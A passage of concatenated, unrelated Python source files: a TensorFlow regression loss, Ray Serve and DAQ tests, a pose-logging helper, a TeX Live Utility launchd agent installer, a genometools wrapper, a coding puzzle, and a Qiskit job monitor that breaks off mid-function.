Cycle-back Regression. There are 3 variants of this loss: i) regression_mse: MSE of the predicted indices and ground truth indices. ii) regression_mse_var: MSE of the predicted indices that takes into account the variance of the similarities. This is important when the rate at which sequences go through different phases changes a lot. The variance scaling allows dynamic weighting of the MSE loss based on the similarities. iii) regression_huber: Huber loss between the predicted indices and ground truth indices. Args: logits: Tensor, Pre-softmax similarity scores after cycling back to the starting sequence. labels: Tensor, One hot labels containing the ground truth. The index where the cycle started is 1. num_steps: Integer, Number of steps in the sequence embeddings. steps: Tensor, step indices/frame indices of the embeddings of the shape [N, T] where N is the batch size, T is the number of the timesteps. seq_lens: Tensor, Lengths of the sequences from which the sampling was done. This can provide additional temporal information to the alignment loss. loss_type: String, This specifies the kind of regression loss function. Currently supported loss functions: regression_mse, regression_mse_var, regression_huber. normalize_indices: Boolean, If True, normalizes indices by sequence lengths. Useful for ensuring numerical instabilities don't arise as sequence indices can be large numbers. variance_lambda: Float, Weight of the variance of the similarity predictions while cycling back. If this is high then the low variance similarities are preferred by the loss while making this term low results in high variance of the similarities (more uniform/random matching). huber_delta: float, Huber delta described in tf.keras.losses.huber_loss. Returns: loss: Tensor, A scalar loss calculated using a variant of regression. """ # Just to be safe, we stop gradients from labels as we are generating labels. labels = tf.stop_gradient(labels) steps = tf.stop_gradient(steps) if normalize_indices: float_seq_lens = tf.cast(seq_lens, tf.float32) tile_seq_lens = tf.tile( tf.expand_dims(float_seq_lens, axis=1), [1, num_steps]) steps = tf.cast(steps, tf.float32) / tile_seq_lens else: steps = tf.cast(steps, tf.float32) beta = tf.nn.softmax(logits) true_time = tf.reduce_sum(steps * labels, axis=1) pred_time = tf.reduce_sum(steps * beta, axis=1) if loss_type in ['regression_mse', 'regression_mse_var']: if 'var' in loss_type: # Variance aware regression. pred_time_tiled = tf.tile(tf.expand_dims(pred_time, axis=1), [1, num_steps]) pred_time_variance = tf.reduce_sum( tf.square(steps - pred_time_tiled) * beta, axis=1) # Using log of variance as it is numerically stabler. pred_time_log_var = tf.math.log(pred_time_variance) squared_error = tf.square(true_time - pred_time) return tf.reduce_mean(tf.math.exp(-pred_time_log_var) * squared_error + variance_lambda * pred_time_log_var) else: return tf.reduce_mean( tf.keras.losses.mean_squared_error(y_true=true_time, y_pred=pred_time)) elif loss_type == 'regression_huber': return tf.reduce_mean(tf.keras.losses.huber_loss( y_true=true_time, y_pred=pred_time, delta=huber_delta)) else: raise ValueError('Unsupported regression loss %s. Supported losses are: ' 'regression_mse, regresstion_mse_var and regression_huber.' % loss_type)
py
1a3f846a3d419966f83e37d957a970d717896f97
import asyncio import time import os import requests import pytest import starlette.responses import ray from ray import serve from ray._private.test_utils import SignalActor, wait_for_condition def test_e2e(serve_instance): @serve.deployment(name="api") def function(starlette_request): return {"method": starlette_request.method} function.deploy() resp = requests.get("http://127.0.0.1:8000/api").json()["method"] assert resp == "GET" resp = requests.post("http://127.0.0.1:8000/api").json()["method"] assert resp == "POST" def test_starlette_response(serve_instance): @serve.deployment(name="basic") def basic(_): return starlette.responses.Response("Hello, world!", media_type="text/plain") basic.deploy() assert requests.get("http://127.0.0.1:8000/basic").text == "Hello, world!" @serve.deployment(name="html") def html(_): return starlette.responses.HTMLResponse( "<html><body><h1>Hello, world!</h1></body></html>" ) html.deploy() assert ( requests.get("http://127.0.0.1:8000/html").text == "<html><body><h1>Hello, world!</h1></body></html>" ) @serve.deployment(name="plain_text") def plain_text(_): return starlette.responses.PlainTextResponse("Hello, world!") plain_text.deploy() assert requests.get("http://127.0.0.1:8000/plain_text").text == "Hello, world!" @serve.deployment(name="json") def json(_): return starlette.responses.JSONResponse({"hello": "world"}) json.deploy() assert requests.get("http://127.0.0.1:8000/json").json()["hello"] == "world" @serve.deployment(name="redirect") def redirect(_): return starlette.responses.RedirectResponse(url="http://127.0.0.1:8000/basic") redirect.deploy() assert requests.get("http://127.0.0.1:8000/redirect").text == "Hello, world!" @serve.deployment(name="streaming") def streaming(_): async def slow_numbers(): for number in range(1, 4): yield str(number) await asyncio.sleep(0.01) return starlette.responses.StreamingResponse( slow_numbers(), media_type="text/plain", status_code=418 ) streaming.deploy() resp = requests.get("http://127.0.0.1:8000/streaming") assert resp.text == "123" assert resp.status_code == 418 def test_deploy_sync_function_no_params(serve_instance): @serve.deployment() def sync_d(): return "sync!" serve.start() sync_d.deploy() assert requests.get("http://localhost:8000/sync_d").text == "sync!" assert ray.get(sync_d.get_handle().remote()) == "sync!" def test_deploy_async_function_no_params(serve_instance): @serve.deployment() async def async_d(): await asyncio.sleep(5) return "async!" serve.start() async_d.deploy() assert requests.get("http://localhost:8000/async_d").text == "async!" assert ray.get(async_d.get_handle().remote()) == "async!" def test_deploy_sync_class_no_params(serve_instance): @serve.deployment class Counter: def __init__(self): self.count = 0 def __call__(self): self.count += 1 return {"count": self.count} serve.start() Counter.deploy() assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 1} assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 2} assert ray.get(Counter.get_handle().remote()) == {"count": 3} def test_deploy_async_class_no_params(serve_instance): @serve.deployment class AsyncCounter: async def __init__(self): await asyncio.sleep(5) self.count = 0 async def __call__(self): self.count += 1 await asyncio.sleep(5) return {"count": self.count} serve.start() AsyncCounter.deploy() assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 1} assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 2} assert ray.get(AsyncCounter.get_handle().remote()) == {"count": 3} def test_user_config(serve_instance): @serve.deployment("counter", num_replicas=2, user_config={"count": 123, "b": 2}) class Counter: def __init__(self): self.count = 10 def __call__(self, *args): return self.count, os.getpid() def reconfigure(self, config): self.count = config["count"] Counter.deploy() handle = Counter.get_handle() def check(val, num_replicas): pids_seen = set() for i in range(100): result = ray.get(handle.remote()) if str(result[0]) != val: return False pids_seen.add(result[1]) return len(pids_seen) == num_replicas wait_for_condition(lambda: check("123", 2)) Counter = Counter.options(num_replicas=3) Counter.deploy() wait_for_condition(lambda: check("123", 3)) Counter = Counter.options(user_config={"count": 456}) Counter.deploy() wait_for_condition(lambda: check("456", 3)) def test_reject_duplicate_route(serve_instance): @serve.deployment(name="A", route_prefix="/api") class A: pass A.deploy() with pytest.raises(ValueError): A.options(name="B").deploy() def test_scaling_replicas(serve_instance): @serve.deployment(name="counter", num_replicas=2) class Counter: def __init__(self): self.count = 0 def __call__(self, _): self.count += 1 return self.count Counter.deploy() counter_result = [] for _ in range(10): resp = requests.get("http://127.0.0.1:8000/counter").json() counter_result.append(resp) # If the load is shared among two replicas. The max result cannot be 10. assert max(counter_result) < 10 Counter.options(num_replicas=1).deploy() counter_result = [] for _ in range(10): resp = requests.get("http://127.0.0.1:8000/counter").json() counter_result.append(resp) # Give some time for a replica to spin down. But majority of the request # should be served by the only remaining replica. assert max(counter_result) - min(counter_result) > 6 def test_delete_deployment(serve_instance): @serve.deployment(name="delete") def function(_): return "hello" function.deploy() assert requests.get("http://127.0.0.1:8000/delete").text == "hello" function.delete() @serve.deployment(name="delete") def function2(_): return "olleh" function2.deploy() for _ in range(10): try: assert requests.get("http://127.0.0.1:8000/delete").text == "olleh" break except AssertionError: time.sleep(0.5) # Wait for the change to propagate. else: assert requests.get("http://127.0.0.1:8000/delete").text == "olleh" def test_starlette_request(serve_instance): @serve.deployment(name="api") async def echo_body(starlette_request): data = await starlette_request.body() return data echo_body.deploy() # Long string to test serialization of multiple messages. UVICORN_HIGH_WATER_MARK = 65536 # max bytes in one message long_string = "x" * 10 * UVICORN_HIGH_WATER_MARK resp = requests.post("http://127.0.0.1:8000/api", data=long_string).text assert resp == long_string def test_start_idempotent(serve_instance): @serve.deployment(name="start") def func(*args): pass func.deploy() assert "start" in serve.list_deployments() serve.start(detached=True) serve.start() serve.start(detached=True) serve.start() assert "start" in serve.list_deployments() def test_shutdown_destructor(serve_instance): signal = SignalActor.remote() @serve.deployment class A: def __del__(self): signal.send.remote() A.deploy() A.delete() ray.get(signal.wait.remote(), timeout=10) # If the destructor errored, it should be logged but also cleaned up. @serve.deployment class B: def __del__(self): raise RuntimeError("Opps") B.deploy() B.delete() if __name__ == "__main__": import sys sys.exit(pytest.main(["-v", "-s", __file__]))
py
1a3f846da97e05ca19c2abc542f6bea97ff8b465
"""Unit tests for configurator""" import unittest import sys import os import time from unittest.mock import MagicMock, mock_open, patch from forch.proto.shared_constants_pb2 import PortBehavior from forch.proto.devices_state_pb2 import DevicePortEvent from daq.runner import DAQRunner, configurator, PortInfo from daq.host import ConnectedHost import network import logging logger = logging.getLogger() logger.level = logging.INFO stream_handler = logging.StreamHandler(sys.stdout) logger.addHandler(stream_handler) class TestRunner(unittest.TestCase): """Test class for Configurator""" config = { 'monitor_scan_sec' : '30', 'default_timeout_sec' : '350', 'base_conf' : 'resources/setups/baseline/base_config.json', 'site_path' : 'local/site/', 'initial_dhcp_lease_time' : '120s', 'dhcp_lease_time' : '500s', 'long_dhcp_response_sec' : '105' } def setUp(self): os.environ = { **os.environ, "DAQ_VERSION": "", "DAQ_LSB_RELEASE": "", "DAQ_SYS_UNAME": "" } configurator.Configurator.load_and_merge = MagicMock(return_value={}) network.TestNetwork.__init__ = MagicMock(return_value=None) DAQRunner._get_test_metadata = MagicMock(return_value={}) with patch("builtins.open", mock_open(read_data="a: b")): self.runner = DAQRunner(self.config) def test_reap_stale_ports(self): """Test port flap timeout config override""" self.runner.target_set_error = MagicMock() device = self.runner._devices.new_device("0000000000", None) self.runner._reap_stale_ports() self.runner.target_set_error.assert_not_called() ConnectedHost.__init__ = MagicMock(return_value=None) host = ConnectedHost() host.test_name = "test_test" device.port.flapping_start = time.time() - 1 device.host = host host.get_port_flap_timeout = MagicMock(return_value=10000) self.runner._reap_stale_ports() self.runner.target_set_error.assert_not_called() host.get_port_flap_timeout = MagicMock(return_value=None) self.runner._reap_stale_ports() host.get_port_flap_timeout.assert_called_with(host.test_name) self.runner.target_set_error.assert_called() def test_reap_stale_ports_with_remote_ports(self): """Test device learn on vlan trigger""" self.runner.target_set_error = MagicMock() device = self.runner._devices.new_device("0000000000", None) mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down) self.runner._handle_remote_port_state(device, mock_port_event) self.runner._reap_stale_ports() self.runner.target_set_error.assert_not_called() ConnectedHost.__init__ = MagicMock(return_value=None) host = ConnectedHost() host.test_name = "test_test" device.host = host host.get_port_flap_timeout = MagicMock(return_value=10000) mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up) self.runner._handle_remote_port_state(device, mock_port_event) self.runner._reap_stale_ports() self.runner.target_set_error.assert_not_called() host.get_port_flap_timeout = MagicMock(return_value=None) mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down) self.runner._handle_remote_port_state(device, mock_port_event) mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up) self.runner._handle_remote_port_state(device, mock_port_event) self.runner._reap_stale_ports() self.runner.target_set_error.assert_not_called() mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down) self.runner._handle_remote_port_state(device, mock_port_event) self.runner._reap_stale_ports() host.get_port_flap_timeout.assert_called_with(host.test_name) self.runner.target_set_error.assert_called() if __name__ == '__main__': unittest.main()
py
1a3f84b9501ecc7ef1b85c932c96d89b8a2e45db
#!/usr/bin/env python3 # IMPORTS # system import sys, time from copy import copy from collections import defaultdict import pdb # math import numpy as np from scipy.spatial.transform import Rotation as R # ros from utils import * class RaptorLogger: """ This helper class writes to /reads from log files. * save_elms is a class var that defines what variables will be in the log files. There are different ones for estimation, ground truth, ssp, and params * to write, the user will pass in an object name and a dict with keys corresponding to the second element of each tuple in save_elms * to read the user gives the object name, and a dict is passed back * params are treated slightly differently, with their own read/write functions """ def __init__(self, mode="write", names=None, base_path="./", b_ssp=False): self.names = names self.base_path = base_path self.b_ssp = b_ssp self.save_elms = {} self.log_data = defaultdict(dict) self.fh = None self.fn = None self.prm_fn = self.base_path + '_prms.log' self.save_elms['est'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int)) ('Ado State Est', 'state_est', 13), ('Ego State Est', 'ego_state_est', 13), ('3D Corner Est (X|Y|Z)', 'corners_3d_est', 8*3), ('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2), ('Angled BB (r|c|w|h|ang_deg)', 'abb', 5), ('Image Segmentation Mode', 'im_seg_mode', 1)] self.save_elms['gt'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int)) ('Ado State GT', 'state_gt', 13), ('Ego State GT', 'ego_state_gt', 13), ('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3), ('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2), ('Angled BB (r|c|w|h|ang_deg)', 'abb', 5), ('Image Segmentation Mode', 'im_seg_mode', 1)] self.save_elms['ssp'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int)) ('Ado State GT', 'state_gt', 13), ('Ado State Est', 'state_est', 13), ('Ego State Est', 'ego_state_est', 13), ('Ego State GT', 'ego_state_gt', 13), ('3D Corner Est (X|Y|Z)', 'corners_3d_gt', 8*3), ('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3), ('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2), ('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2)] if not b_ssp: self.modes = ['est', 'gt'] else: self.modes = ['ssp'] if mode=="read": self.init_read() elif mode=="write": if names is None: raise RuntimeError("Must provide list of names for tracked object") self.init_write() else: raise RuntimeError("Unrecognized logging mode") def init_write(self): all_name_str = '' for n in self.names: all_name_str += (n + ' ') all_name_str = all_name_str[:-1] self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4), ('tf_cam_ego', 'tf_cam_ego', 16), ('Object BB Size (len|wid|hei|diam) [{}]'.format(all_name_str), '3d_bb_dims', 4*len(self.names))] # create files and write headers self.fh = defaultdict(dict) for m in self.modes: for n in self.names: # Create logs fn = self.base_path + '_' + n + '_'+ m + '.log' self.create_file_dir(fn) self.fh[m][n] = open(fn,'w+') # doing this here makes it appendable save_el_shape = (len(self.save_elms[m]), len(self.save_elms[m][0])) data_header = ", ".join(np.reshape([*zip(self.save_elms[m])], save_el_shape)[:,0].tolist()) np.savetxt(self.fh[m][n], X=[], header=data_header) # write header def init_read(self): self.save_elms['prms'] = [('Camera Intrinsics (K)', 'K', 4), ('tf_cam_ego', 'tf_cam_ego', 16), ('Object BB Size (len|wid|hei|diam) []', '3d_bb_dims', -1)] self.read_params() self.fn = defaultdict(dict) for m in self.modes: for n in self.names: self.fn[m][n] = self.base_path + '_' + n + '_'+ m + '.log' def write_params(self, param_data, mode='prms'): # write header self.create_file_dir(self.prm_fn) prm_fh = open(self.prm_fn,'w+') # doing this here makes it appendable save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0])) data_header = ", ".join(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,0].tolist()) np.savetxt(prm_fh, X=[], header=data_header) # write header # write body save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0])) num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int)) out = np.ones((1, num_to_write)) * 1e10 ind = 0 for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]): if dict_str in param_data: try: out[0, ind:(ind + count)] = param_data[dict_str] except: print("issue with {}".format(dict_str)) pdb.set_trace() ind += count out[out>1e5] = np.nan np.savetxt(prm_fh, X=out, fmt='%.6f') # write to file prm_fh.close() def read_params(self, log_type='prms'): # get header f = open(self.prm_fn) header_str = f.readline() self.log_data[log_type]['ado_names'] = header_str.split('[')[1].split(']')[0].split(' ') self.names = self.log_data[log_type]['ado_names'] # Read rest of file data = np.loadtxt(self.prm_fn) f.close() ind = 0 for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]): if len(data.shape) > 1: self.log_data[log_type][dict_str] = data[:, ind:(ind + count)] else: self.log_data[log_type][dict_str] = data[ind:(ind + count)] ind += count if dict_str == 'K': # Turn camera intrinsics back into a matrix K = np.eye(3) K[0, 0] = self.log_data[log_type][dict_str][0] K[1, 1] = self.log_data[log_type][dict_str][1] K[0, 2] = self.log_data[log_type][dict_str][2] K[1, 2] = self.log_data[log_type][dict_str][3] self.log_data[log_type][dict_str] = K elif dict_str == 'tf_cam_ego': self.log_data[log_type][dict_str] = np.reshape(self.log_data[log_type][dict_str], (4, 4)) elif dict_str == '3d_bb_dims': all_sizes = np.asarray(data[ind : ind + 4*len(self.log_data[log_type]['ado_names'])]) bb_3d_dict_all = {} for k, name in enumerate(self.log_data[log_type]['ado_names']): bb_3d_dict_all[name] = all_sizes[4*k : 4*k+4] # len|wid|hei|diam self.log_data[log_type][dict_str] = bb_3d_dict_all return self.log_data[log_type] def write_data_to_log(self, data, name, mode): """ mode can be est, gt, ssp""" if (not self.b_ssp and not mode in ['est', 'gt']) or (self.b_ssp and not mode == 'ssp'): raise RuntimeError("Mode {} not recognized".format(mode)) save_el_shape = (len(self.save_elms[mode]), len(self.save_elms[mode][0])) num_to_write = np.sum(np.reshape([*zip(self.save_elms[mode])], save_el_shape)[:,2].astype(int)) out = np.ones((1, num_to_write)) * 1e10 ind = 0 for i, (header_str, dict_str, count) in enumerate(self.save_elms[mode]): if dict_str in data: try: out[0, ind:(ind + count)] = data[dict_str] except: print("issue with {}".format(dict_str)) pdb.set_trace() ind += count out[out>1e5] = np.nan np.savetxt(self.fh[mode][name], X=out, fmt='%.6f') # write to file def read_logs(self, name): """ Return a dict with keys being log type (est /gt /prms). Each of these is a dict with the various types of values in the log """ if self.names is None: self.log_data[log_type] for log_type in self.fn: if not log_type in self.save_elms: print("Warning: we are are missing the log file for {}".format(log_type)) continue ind = 0 data = np.loadtxt(self.fn[log_type][name]) for i, (header_str, dict_str, count) in enumerate(self.save_elms[log_type]): if len(data.shape) > 1: self.log_data[log_type][dict_str] = data[:, ind:(ind + count)] else: self.log_data[log_type][dict_str] = data[ind:(ind + count)] ind += count return self.log_data def close_files(self): for fh_key in self.fh: if fh_key == 'prms': self.fh[fh_key].close() continue for n in self.names: self.fh[fh_key][n].close() def create_file_dir(self, fn_with_dir): path = "/".join(fn_with_dir.split("/")[:-1]) if not os.path.exists( path ): os.makedirs( path )
py
1a3f84f7581414e7d676e1866622ffaa8bc03e29
#!/usr/bin/env python # # This software is Copyright (c) 2010-2016 # Adam Maxwell. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # - Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # - Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # - Neither the name of Adam Maxwell nor the names of any # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # from optparse import OptionParser import os import sys from subprocess import call as sync_task from shutil import copy2 as copyfile import plistlib LAUNCHCTL_PATH = "/bin/launchctl" SCRIPT_NAME = "texliveupdatecheck" PLIST_NAME = "com.googlecode.mactlmgr.update_check.plist" def log_message(msg): """write a message to standard output""" sys.stderr.write("%s: %s\n" % (os.path.basename(sys.argv[0]), msg)) def installed_plist_path(): """absolute path to the installed plist for the process owner""" plist_dir = "/Library/LaunchAgents" if os.geteuid() == 0 else os.path.expanduser("~/Library/LaunchAgents") return os.path.join(plist_dir, PLIST_NAME) def installed_script_path(): """absolute path to the installed script for the process owner""" script_dir = "/Library/Application Support/TeX Live Utility" if os.geteuid() != 0: script_dir = os.path.expanduser("~" + script_dir) return os.path.join(script_dir, SCRIPT_NAME) def unload_agent(): """returns zero in case of success or if the plist does not exist""" plist_path = installed_plist_path() ret = 0 if os.path.exists(plist_path): ret = sync_task([LAUNCHCTL_PATH, "unload", "-w", "-S", "Aqua", plist_path]) else: log_message("nothing to unload") if ret: log_message("unable to unload agent %s" % (plist_path)) return ret def load_agent(): """returns zero if the plist was loaded, raises if it does not exist""" plist_path = installed_plist_path() assert os.path.exists(plist_path), "%s does not exist" % (plist_path) ret = sync_task([LAUNCHCTL_PATH, "load", "-w", "-S", "Aqua", plist_path]) if ret: log_message("unable to load agent %s" % (plist_path)) return ret def uninstall_agent(): """returns nonzero if the plist exists and could not be unloaded""" plist_path = installed_plist_path() ret = 0 # nonexistence is not a failure if os.path.exists(plist_path): try: os.remove(plist_path) except Exception as e: log_message("ERROR: failed to remove %s" % (plist_path)) ret = 1 else: log_message("nothing to remove") return ret def sync_agent_program_name(): """ensure the launch agent plist has the current program name""" plist_path = installed_plist_path() exec_path = installed_script_path() # mainly for the change from Python update checker to Obj-C if os.path.exists(plist_path) and os.path.exists(exec_path): unload_agent() try: # Now edit the plist in-memory so it points to the correct path, # then save it out to the destination directory (avoids modifying # the passed-in file). with open(plist_path, "rb") as plfile: plist = plistlib.load(plfile) # rewrite entire array plist["ProgramArguments"] = [exec_path] with open(plist_path, "wb") as plfile: plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML) except Exception as e: log_message("ERROR: failed to regenerate launchd plist %s with exception %s" % (plist_path, e)) else: load_agent() def install_agent(source_path): """argument is absolute path to the source property list""" plist_path = installed_plist_path() plist_dir = os.path.dirname(plist_path) ret = 0 if os.path.exists(plist_dir) == False: try: os.makedirs(plist_dir) except Exception as e: log_message("ERROR: failed to create %s" % (plist_dir)) ret = 1 if ret == 0: assert os.path.isdir(plist_dir), "%s is not a directory" % (plist_dir) try: # Now edit the plist in-memory so it points to the correct path, # then save it out to the destination directory (avoids modifying # the passed-in file). with open(source_path, "rb") as plfile: plist = plistlib.load(plfile) # rewrite entire array plist["ProgramArguments"] = [installed_script_path()] with open(plist_path, "wb") as plfile: plistlib.dump(plist, plfile, fmt=plistlib.FMT_XML) except Exception as e: log_message("ERROR: failed to copy %s --> %s" % (source_path, plist_path)) ret = 1 return ret def install_script(source_path): """argument is absolute path to the source script""" script_path = installed_script_path() script_dir = os.path.dirname(script_path) ret = 0 if os.path.exists(script_dir) == False: try: os.makedirs(script_dir) except Exception as e: log_message("ERROR: failed to create %s" % (script_dir)) ret = 1 if ret == 0: assert os.path.isdir(script_dir), "%s is not a directory" % (script_dir) try: copyfile(source_path, script_path) except Exception as e: log_message("ERROR: failed to copy %s --> %s" % (source_path, script_path)) ret = 1 return ret if __name__ == '__main__': parser = OptionParser() parser.add_option("-i", "--install", help="install agent", action="store_true", dest="install", default=False) parser.add_option("-r", "--remove", help="remove agent", action="store_true", dest="remove", default=False) parser.add_option("-p", "--plist", help="path of property list to install", action="store", type="string", dest="source_plist") parser.add_option("-s", "--script", help="path of script to install", action="store", type="string", dest="source_script") (options, args) = parser.parse_args() if options.install == options.remove: if options.install == False: parser.error("an action (install or remove) must be specified") else: parser.error("only one action may be specified") if options.install: if options.source_plist is None and options.source_script is None: parser.error("at least one of option -p or -s is required") # if os.path.isabs(options.source_plist) == False or os.path.isabs(options.source_script) == False: # parser.error("path arguments must be absolute") if options.source_plist and not os.path.isfile(options.source_plist): parser.error("path arguments cannot point to a directory") assert os.path.basename(options.source_plist) == PLIST_NAME, "incorrect plist name defined" if options.source_script and not os.path.isfile(options.source_script): parser.error("path arguments cannot point to a directory") assert os.path.basename(options.source_script) == SCRIPT_NAME, "incorrect script name defined" status = 0 if options.remove: status += unload_agent() status += uninstall_agent() else: assert options.install, "inconsistent option checking" # unload a previous version before installing if options.source_plist: status += unload_agent() if options.source_script: status += install_script(options.source_script) # if unloaded and we have a plist, now try to install and load it if status == 0 and options.source_plist: status = install_agent(options.source_plist) if status == 0: status = load_agent() # in case the name of the script has changed; will also unload/reload if 0 == status: sync_agent_program_name() exit(status)
py
1a3f851cd15ad627a0fbbb015e21d699cb93df63
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (c) 2014 Daniel Standage <[email protected]> # Copyright (c) 2008 Sascha Steinbiss <[email protected]> # Copyright (c) 2008 Center for Bioinformatics, University of Hamburg # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # from gt.dlload import gtlib from gt.annotationsketch.rec_map import RecMap import math def cmp_to_key(mycmp): 'Convert a cmp= function into a key= function' class K(object): def __init__(self, obj, *args): self.obj = obj def __lt__(self, other): return mycmp(self.obj, other.obj) < 0 def __gt__(self, other): return mycmp(self.obj, other.obj) > 0 def __eq__(self, other): return mycmp(self.obj, other.obj) == 0 def __le__(self, other): return mycmp(self.obj, other.obj) <= 0 def __ge__(self, other): return mycmp(self.obj, other.obj) >= 0 def __ne__(self, other): return mycmp(self.obj, other.obj) != 0 return K class ImageInfo: def __init__(self): self.ii = gtlib.gt_image_info_new() self._as_parameter_ = self.ii self.hotspots = None def __del__(self): try: gtlib.gt_image_info_delete(self.ii) except AttributeError: pass def from_param(cls, obj): if not (isinstance(obj, ImageInfo) or obj == None): raise TypeError("argument must be an ImageInfo") if obj == None: return None return obj._as_parameter_ from_param = classmethod(from_param) def get_height(self): return gtlib.gt_image_info_get_height(self.ii) def num_of_rec_maps(self): return gtlib.gt_image_info_num_of_rec_maps(self.ii) def compare_hotspots(cls, hs1, hs2): if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1: return 1 elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1: if hs1[3] > hs2[3]: return 1 elif hs1[3] == hs2[3]: return 0 else: return -1 else: return -1 compare_hotspots = classmethod(compare_hotspots) def each_hotspot(self): if not self.hotspots: self.hotspots = [] for i in range(self.num_of_rec_maps()): rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i)) self.hotspots.append([math.floor(rm.get_northwest_x()), math.floor(rm.get_northwest_y()), math.floor(rm.get_southeast_x()), math.floor(rm.get_southeast_y()), rm.get_genome_feature()]) self.hotspots.sort(key=cmp_to_key(ImageInfo.compare_hotspots)) for hs in self.hotspots: yield (hs[0], hs[1], hs[2], hs[3], hs[4]) def register(cls, gtlib): from ctypes import c_void_p, c_ulong, c_uint gtlib.gt_image_info_delete.restype = None gtlib.gt_image_info_delete.argtypes = [c_void_p] gtlib.gt_image_info_get_rec_map.restype = c_void_p gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong] gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p] gtlib.gt_image_info_get_height.restype = c_uint gtlib.gt_image_info_get_height.argtypes = [c_void_p] gtlib.gt_image_info_new.restype = c_void_p gtlib.gt_image_info_new.argtypes = [] register = classmethod(register)
py
1a3f85bbedeed244c772f25976b32a12411e0eba
# This problem was asked by Facebook. # # Given the mapping a = 1, b = 2, ... z = 26, and an encoded message, count the number of ways it can be decoded. # # For example, the message '111' would give 3, since it could be decoded as 'aaa', 'ka', and 'ak'. # # You can assume that the messages are decodable. For example, '001' is not allowed.
py
1a3f8667207df54e760f93b967c9c212d1a0e9ac
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2018. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A module for monitoring various qiskit functionality""" import sys import time def _text_checker(job, interval, _interval_set=False, quiet=False, output=sys.stdout): """A text-based job status checker Args: job (BaseJob): The job to check. interval (int): The interval at which to check. _interval_set (bool): Was interval time set by user? quiet (bool): If True, do not print status messages. output (file): The file like object to write status messages to. By default this is sys.stdout. """ status = job.status() msg = status.value prev_msg = msg msg_len = len(msg) if not quiet: print('\r%s: %s' % ('Job Status', msg), end='', file=output) while status.name not in ['DONE', 'CANCELLED', 'ERROR']: time.sleep(interval) status = job.status() msg = status.value if status.name == 'QUEUED': msg += ' (%s)' % job.queue_position() if job.queue_position() is None: interval = 2 